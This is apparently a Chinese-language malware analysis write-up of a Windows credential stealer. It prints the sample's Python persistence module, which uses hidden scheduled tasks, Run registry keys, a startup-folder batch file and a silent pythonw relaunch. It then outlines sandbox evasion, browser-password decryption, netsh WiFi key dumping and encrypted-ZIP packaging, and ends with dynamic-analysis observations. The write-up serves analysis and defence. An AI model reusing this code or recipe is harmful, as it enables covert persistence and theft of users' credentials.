  <RegistrationInfo>
    <Description>{self.DESCRIPTION}</Description>
  </RegistrationInfo>
  <Principals>
    <Principal id="LocalUser">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <StartWhenAvailable>true</StartWhenAvailable>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
  </Settings>
  <Triggers>
    <LogonTrigger />
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>cmd.exe</Command>
      <Arguments>/c {command}</Arguments>
    </Exec>
  </Actions>
</Task>"""
            return xml
        except:
            return None

    @_safe_run
    def _add_to_user_run(self) -> bool:
        """Level 2: 添加到 HKEY_CURRENT_USER\\Run"""
        cmd = self._build_powershell_command()
        key_path = _decode(ENCRYPTED["reg_key_user"])
        return self._set_registry_value(winreg.HKEY_CURRENT_USER, key_path, self.TASK_NAME, cmd)

    @_safe_run
    def _add_to_system_run(self) -> bool:
        """Level 3: 添加到 HKEY_LOCAL_MACHINE\\Run(需管理员)"""
        import ctypes
        if not ctypes.windll.shell32.IsUserAnAdmin():
            return False
        cmd = self._build_powershell_command()
        key_path = _decode(ENCRYPTED["reg_key_system"])
        return self._set_registry_value(winreg.HKEY_LOCAL_MACHINE, key_path, self.TASK_NAME, cmd)

    @_safe_run
    def _add_to_startup_folder(self) -> bool:
        """Level 4: 添加到用户启动文件夹(.bat 静默执行)"""
        if not self.startup_folder.exists():
            return False
        bat_content = f"@echo off\n{self._build_powershell_command()}\nexit"
        bat_file = self.startup_folder / f"{self.TASK_NAME}.bat"
        try:
            with open(bat_file, 'w') as f:
                f.write(bat_content)
            return True
        except:
            return False

    def install(self) -> Dict[str, Any]:
        """
        统一入口:执行降级安装
        返回结果字典
        """
        results = {
            "success": False,
            "target": str(self.target_script),
            "steps": {},
            "timestamp": datetime.now().isoformat()
        }

        strategies = [
            (self._create_scheduled_task, "scheduled_task"),
            (self._add_to_user_run, "user_run"),
            (self._add_to_system_run, "system_run"),
            (self._add_to_startup_folder, "startup_folder")
        ]

        for method, name in strategies:
            try:
                success = method() is True
                results["steps"][name] = success
                if success:
                    results["success"] = True
                    break  # 成功则退出降级链
            except Exception:
                results["steps"][name] = False

        return results


# ======================
# 🎯 统一调用接口(推荐方式)
# ======================
def install(target_script: Optional[str] = None) -> Dict[str, Any]:
    """
    简洁接口:供其他 Python 文件一键调用
    示例:
        import silent_persistence
        result = silent_persistence.install()
    """
    try:
        manager = SilentPersistence(target_script)
        return manager.install()
    except Exception as e:
        return {
            "success": False,
            "error": str(e),
            "timestamp": datetime.now().isoformat(),
            "steps": {}
        }


# ======================
# 主入口(静默运行)
# ======================
if __name__ == "__main__":
    # 自动切换到 pythonw 防止弹窗
    if sys.executable.endswith("python.exe"):
        pythonw = sys.executable.replace("python.exe", "pythonw.exe")
        if os.path.exists(pythonw):
            try:
                subprocess.Popen(
                    [pythonw, __file__],
                    creationflags=subprocess.CREATE_NO_WINDOW,
                    close_fds=True
                )
                sys.exit(0)
            except:
                pass  # 继续使用 python.exe

    # 执行安装
    install()

4.代码分析

大模型分析结果:

该项目是一个针对 Windows 系统的红队(Red Team)凭证窃取与持久化工具,核心目标是在目标主机上静默提取敏感凭证信息,并通过多种方式实现持久化、数据加密和扩散,整体流程具备反沙箱检测、无痕执行、数据窃取、加密备份等特征 。

 核心步骤(按执行顺序)
步骤 1:沙箱 / 虚拟机检测(反分析)

调用scanner1.pyscan_environment方法,检测是否运行在虚拟机 / 沙箱环境:

  • 检测维度:BIOS 字符串、系统制造商、磁盘大小、CPU 核心数、内存大小、运行进程(如 VMware 工具)、MAC 地址、鼠标交互、调试器等;
  • 行为:若检测到沙箱 / 虚拟机,直接终止运行,避免被分析。
步骤 2:静默持久化(自启动)

调用config_manager2.pyinstall方法,通过四级降级策略实现程序自启动(成功即停止降级):

  • Level 1:创建隐藏计划任务;
  • Level 2:添加到当前用户注册表HKEY_CURRENT_USER\Run
  • Level 3:添加到系统注册表HKEY_LOCAL_MACHINE\Run(需管理员);
  • Level 4:添加到用户启动文件夹(生成静默批处理文件);
  • 特征:核心逻辑 Base64 加密、无文件残留、全程静默执行。
步骤 3:敏感凭证提取(核心目的)

提取两类核心敏感信息,存入内存后生成结构化数据:

  • 浏览器密码提取(Chrome/Edge):
    1. 复制浏览器Login Data数据库(避免文件锁定);
    2. Local State文件提取 AES 密钥(DPAPI 解密);
    3. 解密数据库中保存的网站账号密码(支持 AES-GCM / 旧版 DPAPI 加密);
    4. 提取后删除临时数据库文件,避免痕迹。
  • WiFi 密码提取
    1. 通过netsh wlan show profiles获取所有 WiFi 配置文件;
    2. 执行netsh wlan show profile name=xxx key=clear提取明文密码;
    3. 静默执行(CREATE_NO_WINDOW),避免弹窗。
步骤 4:数据加密与备份
  • 生成 JSON 报告:将提取的凭证(浏览器 / WiFi)生成结构化 JSON 文件(临时目录);
  • AES-256 加密压缩:用pyzipper将 JSON 打包为加密 ZIP(密码固定为123456),并删除明文 JSON;

5.动态分析

动态执行该程序,观察其行为。

观察进程树,看到样本通过cmd.exe获取系统基本信息;通过schtasks.exe创建计划任务,对应了代码中持久化的功能的第一项;通过netsh.exe来获取网络信息

持久化:

在我的计算机中没有成功创建计划任务,于是完成的是持久化的第二项操作,在注册表启动项中写入该样本的自启动

文件写入:

最后在桌面生成了压缩包,解压后得到该报告,里面有样本收集的信息

更多推荐